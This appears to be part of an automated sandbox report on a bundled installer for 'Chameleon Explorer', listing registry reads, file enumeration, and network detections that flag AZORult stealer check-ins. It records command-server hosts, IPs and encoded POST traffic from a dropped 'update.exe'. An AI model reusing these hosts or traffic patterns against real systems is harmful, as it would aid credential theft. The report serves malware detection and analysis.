Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	6_2_00405BEC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose,	7_2_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004AD294 FindFirstFileW,GetLastError,	7_2_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	7_2_00408174
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,	7_2_004C0BC0
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,	7_2_004C107C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	7_2_004FDF38
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004BF43C FindFirstFileW,FindNextFileW,FindClose,	7_2_004BF43C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	8_2_00413030
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	8_2_004119A8
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	8_2_004119AC
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	8_2_00412D6C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	8_2_0041160C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	8_2_00413F58
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	8_2_00413F58
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: 14_2_0340A504 FindFirstFileW,FindClose,	14_2_0340A504
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: 14_2_03409F38 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	14_2_03409F38

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49744 -> 35.205.61.67:80
Source: Traffic	Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49745 -> 35.205.61.67:80

Source: global traffic	HTTP traffic detected: GET /1AiP77 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 2no.co
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: finlzzm.comContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: finlzzm.comContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.0Host: finlzzm.comConnection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 107Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:

Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://aia.startssl.com/certs/ca.crt0
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://aia.startssl.com/certs/sca.code2.crt06
Source: cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://counter-strike.com.ua/
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.315989967.0000000004945000.00000004.00000001.sdmp, ChameleonExplorer.exe, 00000009.00000003.336612553.0000000001639000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.startssl.com/sca-code2.crl0#
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.startssl.com/sfsca.crl0f
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: update.exe, 00000008.00000003.317739983.00000000021E0000.00000004.00000001.sdmp	String found in binary or memory: http://finlzzm.com/index.php
Source: update.exe	String found in binary or memory: http://ip-api.com/json
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.startssl.com00
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.startssl.com07
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcd.com06
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: cexplorer.tmp, 00000007.00000003.305051880.0000000003110000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.391191941.000000000229D000.00000004.00000001.sdmp, ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.chameleon-managers.com/0
Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	String found in binary or memory: http://www.chameleon-managers.com/contacts.php?program=
